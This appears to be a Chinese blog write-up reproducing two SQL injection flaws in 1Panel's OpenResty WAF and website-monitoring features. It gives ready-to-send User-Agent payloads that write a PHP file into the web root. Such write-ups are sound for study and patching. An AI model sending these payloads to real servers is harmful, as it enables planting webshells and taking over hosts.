1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。且深度集成开源建站软件 WordPress 和 Halo.
测试版本
专业版 v1.10.10-lts 社区版 v1.10.10-lts 1panel/openresty:1.21.4.3-3-1-focal
影响范围
网站监控功能影响 == 1panel/openresty:1.21.4.3-3-1-focal WAF功能影响 <= 1panel/openresty:1.21.4.3-3-1-focal
进入1Panel面板官网选择对应系统下载
curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh
此时会有一个quick_start.sh文件,修改它的版本再安装
sudo bash quick_start.sh
一路默认只需要设置密码,然后会弹出面板地址,复制粘贴进入
选择容器-配置-镜像加速,添加以下内容
https://hub1.nat.tf
https://hub2.nat.tf
安装php7,找到应用商店搜php7,创建运行环境,不需要选扩展
接着应用商店安装openresty,修改版本image: 1panel/openresty:1.21.4.3-3-1-focal
安装完成后点击网站-创建网站-运行环境-主域名改成ip+端口号,代号随便起目录名字
第一个漏洞出现在waf中,先进入高级设置-waf-全局设置-打开
进入容器内部拷贝出漏洞文件
docker cp 容器id:/usr/local/openresty/1pwaf/lib ./
查看lib里的attack文件,以user_agent作为可控点,执行闭合sql语句
输入后缀触发防火墙,此时我们打开bp抓包,更改user-agent部分的内容,payload如下
GET /.git HTTP/1.1
Host: 192.168.101.29
User-Agent: blog.mo60.cn',"args", "sqlInjectA", "", "YmxvZy5tbzYwLmNu", "blog.mo60.cn", 0, "deny", 0, 1);ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
打开面板发现我们通过注入写入了一个文件,内容是user-agent里的内容
访问内容,是blog.mo60.cn的hash值
第二个漏洞需要在专业版进行,需花钱购买,没有马内。。。
利用需要关闭waf,开启网站监控,payload如下
GET / HTTP/1.1
Host: 192.168.99.6
User-Agent: ua', 'blog.mo60.cn', 5201314, '', '', 1, '2024-06-09 08:16:52', 1817921010.847, '/AAAAAAA', 52014, '2025-06-09', '16', '', '', 'Linux', 'edge', 'pc', '', '');ATTACH DATABASE '/www/sites/index/index/mo60.cn.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?= md5("blog.mo60.cn"); ?>');#
Comments NOTHING